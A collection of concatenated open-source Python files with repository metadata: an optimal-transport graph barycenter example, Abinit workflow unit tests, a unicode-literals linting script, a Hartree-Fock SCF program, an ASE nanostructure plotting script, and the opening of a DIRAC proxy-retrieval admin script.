# -*- coding: utf-8 -*-
"""
=================================
Plot graphs' barycenter using FGW
=================================

This example illustrates the computation of the barycenter of labeled graphs using FGW

Requires networkx >=2

.. [18] Vayer Titouan, Chapel Laetitia, Flamary Rémi, Tavenard Romain
    and Courty Nicolas
    "Optimal Transport for structured data with application on graphs"
    International Conference on Machine Learning (ICML). 2019.

"""

# Author: Titouan Vayer <titouan.vayer@irisa.fr>
#
# License: MIT License

#%% load libraries
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import math
from scipy.sparse.csgraph import shortest_path
import matplotlib.colors as mcol
from matplotlib import cm
from ot.gromov import fgw_barycenters

#%% Graph functions


def find_thresh(C, inf=0.5, sup=3, step=10):
    """ Trick to find the adequate thresholds from which values of the C matrix are considered close enough to say that nodes are connected.
        The threshold is found by a linesearch between values "inf" and "sup" with "step" thresholds tested.
        The optimal threshold is the one which minimizes the reconstruction error between the shortest_path matrix coming from the thresholded adjacency matrix and the original matrix.
    Parameters
    ----------
    C : ndarray, shape (n_nodes,n_nodes)
        The structure matrix to threshold
    inf : float
        The beginning of the linesearch
    sup : float
        The end of the linesearch
    step : integer
        Number of thresholds tested
    """
    dist = []
    search = np.linspace(inf, sup, step)
    for thresh in search:
        Cprime = sp_to_adjacency(C, 0, thresh)
        SC = shortest_path(Cprime, method='D')
        SC[SC == float('inf')] = 100
        dist.append(np.linalg.norm(SC - C))
    return search[np.argmin(dist)], dist


def sp_to_adjacency(C, threshinf=0.2, threshsup=1.8):
    """ Thresholds the structure matrix in order to compute an adjacency matrix.
    All values between threshinf and threshsup are considered to represent connected nodes and are set to 1; all other values are set to 0.
    Parameters
    ----------
    C : ndarray, shape (n_nodes,n_nodes)
        The structure matrix to threshold
    threshinf : float
        The minimum value of distance from which the new value is set to 1
    threshsup : float
        The maximum value of distance from which the new value is set to 1
    Returns
    -------
    C : ndarray, shape (n_nodes,n_nodes)
        The threshold matrix. Each element is in {0,1}
    """
    H = np.zeros_like(C)
    np.fill_diagonal(H, np.diagonal(C))
    C = C - H
    C = np.minimum(np.maximum(C, threshinf), threshsup)
    C[C == threshsup] = 0
    C[C != 0] = 1

    return C


def build_noisy_circular_graph(N=20, mu=0, sigma=0.3, with_noise=False, structure_noise=False, p=None):
    """ Create a noisy circular graph
    """
    g = nx.Graph()
    g.add_nodes_from(list(range(N)))
    for i in range(N):
        noise = float(np.random.normal(mu, sigma, 1))
        if with_noise:
            g.add_node(i, attr_name=math.sin((2 * i * math.pi / N)) + noise)
        else:
            g.add_node(i, attr_name=math.sin(2 * i * math.pi / N))
        g.add_edge(i, i + 1)
        if structure_noise:
            randomint = np.random.randint(0, p)
            if randomint == 0:
                if i <= N - 3:
                    g.add_edge(i, i + 2)
                if i == N - 2:
                    g.add_edge(i, 0)
                if i == N - 1:
                    g.add_edge(i, 1)
    g.add_edge(N, 0)
    noise = float(np.random.normal(mu, sigma, 1))
    if with_noise:
        g.add_node(N, attr_name=math.sin((2 * N * math.pi / N)) + noise)
    else:
        g.add_node(N, attr_name=math.sin(2 * N * math.pi / N))
    return g


def graph_colors(nx_graph, vmin=0, vmax=7):
    cnorm = mcol.Normalize(vmin=vmin, vmax=vmax)
    cpick = cm.ScalarMappable(norm=cnorm, cmap='viridis')
    cpick.set_array([])
    val_map = {}
    for k, v in nx.get_node_attributes(nx_graph, 'attr_name').items():
        val_map[k] = cpick.to_rgba(v)
    colors = []
    for node in nx_graph.nodes():
        colors.append(val_map[node])
    return colors

##############################################################################
# Generate data
# -------------

#%% circular dataset
# We build a dataset of noisy circular graphs.
# Noise is added on the structures by random connections and on the features by Gaussian noise.

np.random.seed(30)
X0 = []
for k in range(9):
    X0.append(build_noisy_circular_graph(np.random.randint(15, 25), with_noise=True, structure_noise=True, p=3))

##############################################################################
# Plot data
# ---------

#%% Plot graphs

plt.figure(figsize=(8, 10))
for i in range(len(X0)):
    plt.subplot(3, 3, i + 1)
    g = X0[i]
    pos = nx.kamada_kawai_layout(g)
    nx.draw(g, pos=pos, node_color=graph_colors(g, vmin=-1, vmax=1), with_labels=False, node_size=100)
plt.suptitle('Dataset of noisy graphs. Color indicates the label', fontsize=20)
plt.show()

##############################################################################
# Barycenter computation
# ----------------------

#%% We compute the barycenter using FGW. Structure matrices are computed using the shortest_path distance in the graph
# Feature distances are the Euclidean distances

Cs = [shortest_path(nx.adjacency_matrix(x)) for x in X0]
ps = [np.ones(len(x.nodes())) / len(x.nodes()) for x in X0]
Ys = [np.array([v for (k, v) in nx.get_node_attributes(x, 'attr_name').items()]).reshape(-1, 1) for x in X0]
lambdas = np.array([np.ones(len(Ys)) / len(Ys)]).ravel()
sizebary = 15  # we choose a barycenter with 15 nodes

A, C, log = fgw_barycenters(sizebary, Ys, Cs, ps, lambdas, alpha=0.95, log=True)

##############################################################################
# Plot Barycenter
# -------------------------

#%% Create the barycenter
bary = nx.from_numpy_matrix(sp_to_adjacency(C, threshinf=0, threshsup=find_thresh(C, sup=100, step=100)[0]))
for i, v in enumerate(A.ravel()):
    bary.add_node(i, attr_name=v)

#%%
pos = nx.kamada_kawai_layout(bary)
nx.draw(bary, pos=pos, node_color=graph_colors(bary, vmin=-1, vmax=1), with_labels=False)
plt.suptitle('Barycenter', fontsize=20)
plt.show()
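##############################################################################
# Sanity check of the thresholding trick (editor's sketch)
# --------------------------------------------------------

#%% Not part of the original example: for a noise-free cycle every edge has
# unit weight, so ``find_thresh`` is expected to return a threshold between
# 1 and 2 when fed the cycle's shortest-path matrix (the reconstruction
# error is then exactly zero). All names used here are defined above.

g_check = build_noisy_circular_graph(10)
C_check = shortest_path(nx.adjacency_matrix(g_check))
thresh_check, _ = find_thresh(C_check, inf=0.5, sup=3, step=10)
print('Recovered threshold for a clean 10-cycle:', thresh_check)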
rflamary/POT
examples/plot_barycenter_fgw.py
Python
mit
6,357
[ "Gaussian" ]
efd33d1bee93cb577a4f40b0e3dd15fb170faff252e522c9a3597da9f6dd9bdd
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import unicode_literals, division, print_function import os import tempfile import shutil from pymatgen.util.testing import PymatgenTest from monty.functools import lazy_property from pymatgen.core.lattice import Lattice from pymatgen.core.structure import Structure from pymatgen.io.abinit import * from pymatgen.io.abinit.flows import * from pymatgen.io.abinit.works import * from pymatgen.io.abinit.tasks import * from pymatgen.io.abinit.pseudos import Pseudo _test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", "..", 'test_files', "abinit") def ref_file(filename): return os.path.join(_test_dir, filename) class FakeAbinitInput(object): """Emulate an Abinit input.""" @lazy_property def pseudos(self): return [Pseudo.as_pseudo(ref_file("14si.pspnc"))] @lazy_property def structure(self): coords = [] coords.append([0, 0, 0]) coords.append([0.75, 0.5, 0.75]) lattice = Lattice([[3.8401979337, 0.00, 0.00], [1.9200989668, 3.3257101909, 0.00], [0.00, -2.2171384943, 3.1355090603]]) return Structure(lattice, ["Si", "Si"], coords) def get(self, key, default=None): """The real AbinitInput is a dict-like object.""" if default is not None: return default return key class FlowUnitTest(PymatgenTest): """Provides helper function for testing Abinit flows.""" MANAGER = """\ policy: autoparal: 1 qadapters: - &batch priority: 1 queue: qtype: slurm qname: Oban qparams: mail_user: nobody@nowhere limits: timelimit: 0:20:00 min_cores: 4 max_cores: 12 #condition: {"$eq": {omp_threads: 2}} hardware: num_nodes: 10 sockets_per_node: 1 cores_per_socket: 2 mem_per_node: 4 Gb job: modules: - intel/compilerpro/13.0.1.117 - fftw3/intel/3.3 shell_env: PATH: /home/user/tmp_intel13/src/98_main/:/home/user//NAPS/intel13/bin:$PATH LD_LIBRARY_PATH: /home/user/NAPS/intel13/lib:$LD_LIBRARY_PATH mpi_runner: mpirun # Connection to the MongoDb database (optional) db_connector: database: abinit collection: test #host: 0.0.0.0 #port: 8080 #user: gmatteo #password: helloworld batch_adapter: *batch """ def setUp(self): """Initialization phase.""" super(FlowUnitTest, self).setUp() # Temporary directory for the flow. self.workdir = tempfile.mkdtemp() # Create the TaskManager. 
self.manager = TaskManager.from_string(self.MANAGER) # Fake input file self.fake_input = FakeAbinitInput() def tearDown(self): """Delete workdir""" shutil.rmtree(self.workdir) class FlowTest(FlowUnitTest): def test_base(self): """Testing Flow...""" aequal, atrue, afalse = self.assertEqual, self.assertTrue, self.assertFalse flow = Flow(workdir=self.workdir, manager=self.manager) # Build a work with a task work = flow.register_task(self.fake_input) assert work.is_work task0_w0 = work[0] atrue(task0_w0.is_task) print(task0_w0.status.colored) atrue(len(flow) == 1) aequal(flow.num_tasks, 1) atrue(flow.has_db) #print(task0_w0.input_structure) print(task0_w0.make_input) # Task history assert len(task0_w0.history) == 0 task0_w0.history.info("Hello %s", "world") assert len(task0_w0.history) == 1 print(task0_w0.history) record = task0_w0.history.pop() print(record, repr(record)) assert record.get_message(asctime=False) == "Hello world" assert len(task0_w0.history) == 0 assert flow.select_tasks(nids=task0_w0.node_id)[0] == task0_w0 assert flow.select_tasks(wslice=slice(0,1,1)) == [task0_w0] # Build a workflow containing two tasks depending on task0_w0 work = Work() atrue(work.is_work) work.register(self.fake_input) work.register(self.fake_input) aequal(len(work), 2) flow.register_work(work, deps={task0_w0: "WFK"}) atrue(flow.is_flow) aequal(len(flow), 2) # Add another work without dependencies. task0_w2 = flow.register_task(self.fake_input)[0] atrue(len(flow) == 3) afalse(flow.is_work) # Allocate internal tables flow.allocate() # Check dependencies. atrue(flow[1].depends_on(task0_w0)) atrue(flow[1][0].depends_on(task0_w0)) atrue(flow[1][0] in task0_w0.get_children()) atrue(task0_w0 in flow[1][0].get_parents()) afalse(flow[2][0].depends_on(task0_w0)) afalse(flow[2][0] in task0_w0.get_children()) afalse(task0_w0 in flow[2][0].get_parents()) aequal(flow[1].pos, 1) aequal(flow[1][0].pos, (1, 0)) aequal(flow[2][0].pos, (2, 0)) afalse(flow.all_ok) aequal(flow.num_tasks, 4) aequal(flow.ncores_used, 0) # API for iterations aequal(len(list(flow.iflat_tasks(status="Initialized"))), sum(len(work) for work in flow)) aequal(list(flow.iflat_tasks(nids=task0_w0.node_id)), [task0_w0]) aequal([task0_w0], flow.tasks_from_nids(task0_w0.node_id)) aequal([(0, 0)], flow.wti_from_nids(task0_w0.node_id)) aequal([task0_w2], flow.tasks_from_nids([task0_w2.node_id])) aequal([(2, 0)], flow.wti_from_nids([task0_w2.node_id])) # Check for deadlocks flow.check_dependencies() # Save the flow in pickle format. flow.build_and_pickle_dump() # Find the pickle file in workdir and recreate the flow. 
same_flow = Flow.pickle_load(self.workdir) aequal(same_flow, flow) # to/from string # FIXME This does not work with py3k #s = flow.pickle_dumps(protocol=0) #same_flow = Flow.pickle_loads(s) #aequal(same_flow, flow) self.assertMSONable(flow) flow.show_info() flow.show_summary() flow.show_inputs() flow.show_inputs(varnames="znucl") # Test show_status flow.show_status() flow.show_event_handlers() def test_workdir(self): """Testing if one can use workdir=None in flow.__init__ and then flow.allocate(workdir).""" flow = Flow(workdir=None, manager=self.manager) flow.register_task(self.fake_input) #flow.register_work(work) work = Work() work.register_scf_task(self.fake_input) flow.register_work(work) # If flow.workdir is None, we should use flow.allocate(workdir) with self.assertRaises(RuntimeError): flow.allocate() tmpdir = tempfile.mkdtemp() flow.allocate(workdir=tmpdir) print(flow) assert len(flow) == 2 flow.build() for i, work in enumerate(flow): assert work.workdir == os.path.join(tmpdir, "w%d" % i) for t, task in enumerate(work): assert task.workdir == os.path.join(work.workdir, "t%d" % t) class TestFlowInSpectatorMode(FlowUnitTest): def test_spectator(self): flow = Flow(workdir=self.workdir, manager=self.manager) work0 = Work() work0.register_scf_task(self.fake_input) work0.register_scf_task(self.fake_input) work1 = Work() work1.register_scf_task(self.fake_input) flow.register_work(work0) flow.register_work(work1) flow.disconnect_signals() flow.disconnect_signals() flow.connect_signals() flow.connect_signals() for mode in [False, True]: flow.set_spectator_mode(mode=mode) assert flow.in_spectator_mode == mode for node in flow.iflat_nodes(): assert node.in_spectator_mode == mode assert len(list(flow.iflat_nodes())) == 1 + len(flow.works) + sum(len(work) for work in flow) assert flow.node_from_nid(flow.node_id) == flow flow.set_spectator_mode(mode=False) flow.build_and_pickle_dump() # pickle load always returns a flow in spectator mode. flow = Flow.pickle_load(flow.workdir) assert flow.in_spectator_mode #with self.assertRaises(flow.SpectatorError): flow.pickle_dump() #with self.assertRaises(flow.SpectatorError): flow.make_scheduler().start() work = flow[0] assert work.send_signal(work.S_OK) is None #with self.assertRaises(work.SpectatorError): work.on_ok() #with self.assertRaises(work.SpectatorError): work.on_all_ok() task = work[0] assert task.send_signal(task.S_OK) is None #with self.assertRaises(task.SpectatorError): task._on_done() #with self.assertRaises(task.SpectatorError): task.on_ok() #with self.assertRaises(task.SpectatorError): task._on_ok() class TestBatchLauncher(FlowUnitTest): def test_batchlauncher(self): """Testing BatchLauncher methods.""" # Create the TaskManager. manager = TaskManager.from_string(self.MANAGER) print("batch_adapter", manager.batch_adapter) assert manager.batch_adapter is not None def build_flow_with_name(name): """Build a flow with workdir None and the given name.""" flow = Flow(workdir=None, manager=self.manager) flow.set_name(name) flow.register_task(self.fake_input) work = Work() work.register_scf_task(self.fake_input) flow.register_work(work) return flow from pymatgen.io.abinit.launcher import BatchLauncher tmpdir = tempfile.mkdtemp() batch = BatchLauncher(workdir=tmpdir, manager=manager) print(batch) flow0 = build_flow_with_name("flow0") flow1 = build_flow_with_name("flow1") flow2_same_name = build_flow_with_name("flow1") batch.add_flow(flow0) # Cannot add the same flow twice. 
with self.assertRaises(batch.Error): batch.add_flow(flow0) batch.add_flow(flow1) # Cannot add two flows with the same name. with self.assertRaises(batch.Error): batch.add_flow(flow2_same_name) batch.submit(dry_run=True) for i, flow in enumerate([flow0, flow1]): assert flow.workdir == os.path.join(batch.workdir, "flow%d" % i) batch.pickle_dump() batch_from_pickle = BatchLauncher.pickle_load(batch.workdir) assert all(f1 == f2 for f1, f2 in zip(batch.flows, batch_from_pickle.flows)) if __name__ == '__main__': import unittest2 as unittest unittest.main()
aykol/pymatgen
pymatgen/io/abinit/tests/test_flows.py
Python
mit
10,970
[ "ABINIT", "pymatgen" ]
ee8e5b849a2a5c6d6155fb2a2e456ee5dfd98af675b8890941f6662b23b31d1e
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
import re
from ast import BinOp, Mod, parse

from six import text_type

import click
from sanity_utils import find_files, XNodeVisitor

encoding_comment_regexp = re.compile(r'^#.+coding[=:]\s*([-\w.]+).+$', re.MULTILINE | re.I)


class StringVisitor(XNodeVisitor):
    def __init__(self):
        self.texts = set()
        self.formattees = set()

    def visit_Str(self, node, parents):  # noqa (N802)
        s = text_type(node.s)
        is_being_formatted = (parents and isinstance(parents[-1], BinOp) and isinstance(parents[-1].op, Mod))
        if is_being_formatted:
            self.formattees.add(s)
            return
        if not ("\n" in s or s.islower() or s.isupper()):
            # Doesn't look like a constant or docstring
            if " " in s.strip():
                # Has spaces, that's texty
                if "%" in s or not all(32 <= ord(c) < 127 for c in s):
                    # Has a formatting character or is non-ascii
                    self.texts.add(s)

    def get_stats(self):
        stat_bits = []
        if self.texts:
            stat_bits.append("%d text-like strings" % len(self.texts))
        if self.formattees:
            stat_bits.append("%d formattee strings" % len(self.formattees))
        return ", ".join(stat_bits)

    def needs_fix(self):
        return bool(self.texts or self.formattees)


def process_file(path):
    sv = StringVisitor()
    with open(path, "rb") as fp:
        source = fp.read()
    if b"unicode_literals" not in source:
        sv.visit(parse(source, path))
    return sv


def fix_file(path):
    with open(path, "rb") as fp:
        source = fp.read().decode("utf-8")
    source_lines = source.splitlines()
    need_encoding_comment = any(ord(c) > 127 for c in source)
    first_non_comment_line_index = 0
    for line_index, line in enumerate(source_lines):
        if not line.strip():
            continue
        if encoding_comment_regexp.match(line):
            need_encoding_comment = False
        if not line.startswith("#"):
            first_non_comment_line_index = line_index
            break
    if "from __future__ import unicode_literals" not in source:
        source_lines.insert(first_non_comment_line_index, "from __future__ import unicode_literals")
        source = "\n".join(source_lines)
    if need_encoding_comment:
        source = "# -*- coding: utf-8 -*-\n" + source
    with open(path, "wb") as fp:
        fp.write(source.encode("utf-8"))
        fp.write(b"\n")


def gather_files(dirnames, filenames):
    files_to_process = []
    files_to_process.extend(filename for filename in filenames if filename.endswith(".py"))
    files_to_process.extend(find_files(dirnames, allowed_extensions=(".py",)))
    return files_to_process


@click.command()
@click.option("-f", "--file", "filenames", type=click.Path(exists=True, dir_okay=False), multiple=True)
@click.option("-d", "--dir", "dirnames", type=click.Path(exists=True, file_okay=False), multiple=True)
@click.option('--fix/--no-fix', default=False)
def command(filenames, dirnames, fix):
    for filename in gather_files(dirnames, filenames):
        visitor = process_file(filename)
        if visitor.needs_fix():
            print("%s: %s" % (filename, visitor.get_stats()))
            if fix:
                print("Fixing: %s" % filename)
                fix_file(filename)


if __name__ == "__main__":
    command()
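# Example invocation (editor's sketch; the directory name is hypothetical):
#
#   $ python ensure_unicode_literals.py -d shoop/ --fix
#
# This reports every .py file containing text-like string literals that are
# not yet unicode-safe and, with --fix, prepends the __future__ import (plus
# an encoding comment when the file contains non-ASCII characters).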
akx/shoop
_misc/ensure_unicode_literals.py
Python
agpl-3.0
3,600
[ "VisIt" ]
4ab03fb022ee855296d6d4284ba25bded95a82c7d185751236a201d8c77f3a05
import sys import numpy as np import numpy.linalg as npl from eric.molecule import Molecule from eric.utils import print_mat np.set_printoptions(precision=8, linewidth=200, suppress=True) def getargs(): import argparse parser = argparse.ArgumentParser() parser.add_argument('--stub', default="h2o_sto3g") parser.add_argument('--nbasis', type=int, default=7) parser.add_argument('--nelec', type=int, default=10) parser.add_argument('--thresh-e', type=int, default=15) parser.add_argument('--thresh-d', type=int, default=10) parser.add_argument('--guess', choices=('hcore', 'gwh'), default='hcore', help="""How should the guess for the initial MO coefficients be obtained?""") args = parser.parse_args() return args def parse_file_1(filename): with open(filename) as fh: val = float(fh.readline()) return val def parse_int_file_2(filename, dim): mat = np.zeros(shape=(dim, dim)) with open(filename) as fh: contents = fh.readlines() for line in contents: mu, nu, intval = map(float, line.split()) mu, nu = int(mu - 1), int(nu - 1) mat[mu, nu] = mat[nu, mu] = intval return mat def parse_int_file_4(filename, dim): # be very inefficient with how we store these for now -- use all 4 # indices mat = np.zeros(shape=(dim, dim, dim, dim)) with open(filename) as fh: contents = fh.readlines() for line in contents: mu, nu, lm, sg, intval = map(float, line.split()) mu, nu, lm, sg = int(mu - 1), int(nu - 1), int(lm - 1), int(sg - 1) mat[mu, nu, lm, sg] = \ mat[mu, nu, sg, lm] = \ mat[nu, mu, lm, sg] = \ mat[nu, mu, sg, lm] = \ mat[lm, sg, mu, nu] = \ mat[lm, sg, nu, mu] = \ mat[sg, lm, mu, nu] = \ mat[sg, lm, nu, mu] = intval return mat ## This doesn't work like it does for the Fock build. # def build_density(P, C, nbasis, nocc): # for mu in range(nbasis): # for nu in range(nbasis): # for m in range(nocc): # P[mu, nu] += C[mu, m] * C[nu, m] # return def build_density(C, nocc): """Form the density matrix from contraction over the occupied columns of the MO coefficient matrix. """ return np.dot(C[:, :nocc], C[:, :nocc].T) def calc_elec_energy(P, H, F): """Calculate the electronic energy from contracting the density matrix with the one- (core Hamiltonian) and two- (Fock matrix) electron components of the Hamiltonian. """ return np.sum(P * (H + F)) def build_fock(F, P, H, ERI, nbasis): """Build the Fock matrix in-place.""" for mu in range(H.shape[0]): for nu in range(H.shape[1]): F[mu, nu] = H[mu, nu] for lm in range(P.shape[0]): for sg in range(P.shape[1]): F[mu, nu] += (P[lm, sg] * (2*ERI[mu, nu, lm, sg] - ERI[mu, lm, nu, sg])) return def rmsd_density(D_new, D_old): """Calculate the root mean square deviation between two density matrices. """ return np.sqrt(np.sum((D_new - D_old)**2)) def population_analysis(mol, pop_mat, basis_function_indices): """Perform population analysis...""" charges = [] for i in range(mol.size): # The basis function indices for each atom. bfi = basis_function_indices[i] # Take the trace of the "population" matrix block # corresponding to each individual atom. Assuming that the # indices are in order, and the block is bounded by the first # and last elements of bfi. Is there a better way to do fancy # indexing here? tr = np.trace(pop_mat[bfi[0]:bfi[-1]+1, bfi[0]:bfi[-1]+1]) # Definition of the final charge. 
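        # (Editor's note, illustrative) For a closed-shell RHF density built
        # from doubly-occupied MOs, both population schemes used below reduce
        # to
        #   q_A = Z_A - 2 * Tr[(pop_mat)_AA],
        # the factor of 2 accounting for the two electrons per orbital.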
charge = mol.charges[i] - 2 * tr charges.append(charge) return np.asarray(charges) def guess_gwh(mat_h, mat_s, cx=1.75): """From the core Hamiltonian and overlap matrices, form the matrix for the generalized Wolfsberg-Helmholz approximation (DOI: 10.1063/1.1700580) The default value of 1.75 is from the Q-Chem 4.3 manual. """ assert mat_h.shape == mat_s.shape nr, nc = mat_h.shape assert nr == nc mat_gwh = np.empty_like(mat_h) for mu in range(nr): for nu in range(nc): mat_gwh[mu, nu] = mat_s[mu, nu] * (mat_h[mu, mu] + mat_h[nu, nu]) mat_gwh *= (cx / 2) return mat_gwh if __name__ == "__main__": args = getargs() nelec = args.nelec nocc = nelec // 2 dim = nbasis = args.nbasis stub = args.stub + "_" mol = Molecule(stub + "geom.dat") filename_enuc = stub + "enuc.dat" filename_s = stub + "s.dat" filename_t = stub + "t.dat" filename_v = stub + "v.dat" filename_eri = stub + "eri.dat" e_nuc = parse_file_1(filename_enuc) mat_s = parse_int_file_2(filename_s, dim) mat_t = parse_int_file_2(filename_t, dim) mat_v = parse_int_file_2(filename_v, dim) mat_eri = parse_int_file_4(filename_eri, dim) print("Nuclear repulsion energy = {}\n".format(e_nuc)) print("Overlap Integrals:") print_mat(mat_s) print("Kinetic-Energy Integrals:") print_mat(mat_t) print("Nuclear Attraction Integrals:") print_mat(mat_v) mat_h = mat_t + mat_v print("Core Hamiltonian:") print_mat(mat_h) lam_s, l_s = npl.eigh(mat_s) lam_s = lam_s * np.eye(len(lam_s)) lam_sqrt_inv = np.sqrt(npl.inv(lam_s)) symm_orthog = np.dot(l_s, np.dot(lam_sqrt_inv, l_s.T)) print("S^-1/2 Matrix:") print_mat(symm_orthog) if args.guess == "hcore": f_prime = np.dot(symm_orthog.T, np.dot(mat_h, symm_orthog)) elif args.guess == "gwh": mat_gwh = guess_gwh(mat_h, mat_s, cx=1.75) f_prime = np.dot(symm_orthog.T, np.dot(mat_gwh, symm_orthog)) else: print("Invalid guess.", file=sys.stderr) sys.exit(1) print("Initial F' Matrix:") print_mat(f_prime) eps, c_prime = npl.eigh(f_prime) eps = eps * np.eye(len(eps)) c = np.dot(symm_orthog, c_prime) print("Initial C Matrix:") print_mat(c) d = build_density(c, nocc) print("Initial Density Matrix:") print_mat(d) e_elec_new = calc_elec_energy(d, mat_h, mat_h) e_total = e_elec_new + e_nuc delta_e = e_total print(" Iter E(elec) E(tot) Delta(E) RMS(D)") print(" {:4d} {:20.12f} {:20.12f}".format(0, e_elec_new, e_total)) t = " {:4d} {:20.12f} {:20.12f} {:20.12f} {:20.12f}".format f = np.empty(shape=(nbasis, nbasis)) thresh_e = 10**(-args.thresh_e) thresh_d = 10**(-args.thresh_d) iteration = 1 max_iterations = 1024 rmsd_d = 99999.9 while iteration < max_iterations: build_fock(f, d, mat_h, mat_eri, nbasis) f_prime = np.dot(symm_orthog.T, np.dot(f, symm_orthog)) eps, c_prime = npl.eigh(f_prime) eps = eps * np.eye(len(eps)) c = np.dot(symm_orthog, c_prime) d_old = d d = build_density(c, nocc) e_elec_old = e_elec_new e_elec_new = calc_elec_energy(d, mat_h, f) e_tot = e_elec_new + e_nuc if iteration == 1: print("Fock Matrix:") print_mat(f) print(t(iteration, e_elec_new, e_tot, 0.0, 0.0)) else: print(t(iteration, e_elec_new, e_tot, delta_e, rmsd_d)) delta_e = e_elec_new - e_elec_old rmsd_d = rmsd_density(d, d_old) if (delta_e < thresh_e) and (rmsd_d < thresh_d): print("Convergence achieved.") break f = f_prime iteration += 1 # At convergence, the Fock matrix should be diagonal in the MO # basis. f_mo = np.dot(c.T, np.dot(f, c)) print_mat(f_mo) # Save things to disk for use in other routines. 
np.savez_compressed("H.npz", mat_h) np.savez_compressed("TEI_AO.npz", mat_eri) np.savez_compressed("C.npz", c) np.savez_compressed("F_MO.npz", f_mo) mat_dipole_x = parse_int_file_2(stub + "mux.dat", dim) mat_dipole_y = parse_int_file_2(stub + "muy.dat", dim) mat_dipole_z = parse_int_file_2(stub + "muz.dat", dim) dipole_elec = 2 * np.array([np.sum(d * mat_dipole_x), np.sum(d * mat_dipole_y), np.sum(d * mat_dipole_z)]) dipole_moment_elec = npl.norm(dipole_elec) dipole_nuc = mol.calc_dipole_nuc() dipole_moment_nuc = npl.norm(dipole_nuc) dipole_total = dipole_elec + dipole_nuc dipole_moment_total = npl.norm(dipole_total) print("Dipole components (electronic, a.u.):") print("X: {:20.12f}".format(dipole_elec[0])) print("Y: {:20.12f}".format(dipole_elec[1])) print("Z: {:20.12f}".format(dipole_elec[2])) print("Dipole components (nuclear, a.u.):") print("X: {:20.12f}".format(dipole_nuc[0])) print("Y: {:20.12f}".format(dipole_nuc[1])) print("Z: {:20.12f}".format(dipole_nuc[2])) print("Dipole components (total, a.u.):") print("X: {:20.12f}".format(dipole_total[0])) print("Y: {:20.12f}".format(dipole_total[1])) print("Z: {:20.12f}".format(dipole_total[2])) print("Dipole moment (a.u.):") print("electronic: {:20.12f}".format(dipole_moment_elec)) print("nuclear : {:20.12f}".format(dipole_moment_nuc)) print("total : {:20.12f}".format(dipole_moment_total)) # This is cheating. How to determine this automatically without # any a priori knowledge of the basis set? basis_function_indices = [ [0, 1, 2, 3, 4,], [5,], [6,], ] # Mulliken population analysis. mat_mulliken = np.dot(d, mat_s) charges_mulliken = population_analysis(mol, mat_mulliken, basis_function_indices) print("Population analysis (Mulliken):") print(" Charges:") for i in range(mol.size): print(" {:3d} {:3d} {:20.12f}".format(i + 1, mol.charges[i], charges_mulliken[i])) print(sum(charges_mulliken)) print(" trace: {}".format(np.trace(mat_mulliken))) # Loewdin population analysis. mat_loewdin = np.dot(npl.inv(symm_orthog), np.dot(d, npl.inv(symm_orthog))) charges_loewdin = population_analysis(mol, mat_loewdin, basis_function_indices) print("Population analysis (Loewdin):") print(" Charges:") for i in range(mol.size): print(" {:3d} {:3d} {:20.12f}".format(i + 1, mol.charges[i], charges_loewdin[i])) print(sum(charges_loewdin)) print(" trace: {}".format(np.trace(mat_loewdin)))
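# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original script): Mulliken and Loewdin
# charges differ atom by atom, but both must conserve the same total charge,
# since Tr(D S) == Tr(S^{1/2} D S^{1/2}) by cyclic invariance of the trace.
assert abs(sum(charges_mulliken) - sum(charges_loewdin)) < 1e-8, \
    "population schemes disagree on the total molecular charge"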
berquist/programming_party
eric/project3/project3.py
Python
mpl-2.0
10,708
[ "Q-Chem" ]
618e75ebcf5b806ac440c2f04f36f27440c7a759d72839cf99969d6585101fd0
# creates: a1.png a2.png a3.png cnt1.png cnt2.png gnr1.png gnr2.png
from ase.io import write
from ase.lattice import bulk
from ase.structure import nanotube, graphene_nanoribbon
import numpy as np

for i, a in enumerate([
        bulk('Cu', 'fcc', a=3.6),
        bulk('Cu', 'fcc', a=3.6, orthorhombic=True),
        bulk('Cu', 'fcc', a=3.6, cubic=True)]):
    write('a%d.pov' % (i + 1), a,
          show_unit_cell=2, display=False, run_povray=True)

cnt1 = nanotube(6, 0, length=4)
cnt1.rotate('x', 'z', rotate_cell=True)
cnt2 = nanotube(3, 3, length=6, bond=1.4, symbol='Si')
cnt2.rotate('x', 'z', rotate_cell=True)

for i, a in enumerate([cnt1, cnt2]):
    write('cnt%d.pov' % (i + 1), a,
          show_unit_cell=2, display=False, run_povray=True)

ind = [2, 0, 1]
gnr1 = graphene_nanoribbon(3, 4, type='armchair', saturated=True)
gnr1.set_cell(np.diag(gnr1.cell)[ind])
gnr1.positions = gnr1.positions[:, ind]
gnr2 = graphene_nanoribbon(2, 6, type='zigzag', saturated=True,
                           C_H=1.1, C_C=1.4, vacuum=3.0,
                           magnetic=True, initial_mag=1.12)
gnr2.set_cell(np.diag(gnr2.cell)[ind])
gnr2.positions = gnr2.positions[:, ind]

for i, a in enumerate([gnr1, gnr2]):
    write('gnr%d.pov' % (i + 1), a,
          show_unit_cell=2, display=False, run_povray=True)
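# Editor's note (illustrative): rendering requires a working POV-Ray
# installation; with run_povray=True each .pov scene written above is
# immediately ray-traced into the matching .png listed in the header.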
grhawk/ASE
tools/doc/ase/structure.py
Python
gpl-2.0
1,298
[ "ASE" ]
7cad5537c40432e00f5cc6ddf0096c4d13f9cd3fce36b92d674e02632dc3087c
#!/usr/bin/env python
########################################################################
# File :    dirac-admin-get-proxy
# Author :  Stuart Paterson
########################################################################
"""
Retrieve a delegated proxy for the given user and group
"""
from __future__ import print_function
import os

import DIRAC
from DIRAC.Core.Base import Script
from DIRAC.FrameworkSystem.Client.ProxyManagerClient import gProxyManager
from DIRAC.ConfigurationSystem.Client.Helpers import Registry

__RCSID__ = "$Id$"


class Params:

  limited = False
  proxyPath = False
  proxyLifeTime = 86400
  enableVOMS = False
  vomsAttr = False

  def setLimited( self, args ):
    self.limited = True
    return DIRAC.S_OK()

  def setProxyLocation( self, args ):
    self.proxyPath = args
    return DIRAC.S_OK()

  def setProxyLifeTime( self, arg ):
    try:
      fields = [ f.strip() for f in arg.split( ":" ) ]
      self.proxyLifeTime = int( fields[0] ) * 3600 + int( fields[1] ) * 60
    except ( ValueError, IndexError ):
      print("Can't parse %s as a time! Expected HH:MM" % arg)
      return DIRAC.S_ERROR( "Can't parse time argument" )
    return DIRAC.S_OK()

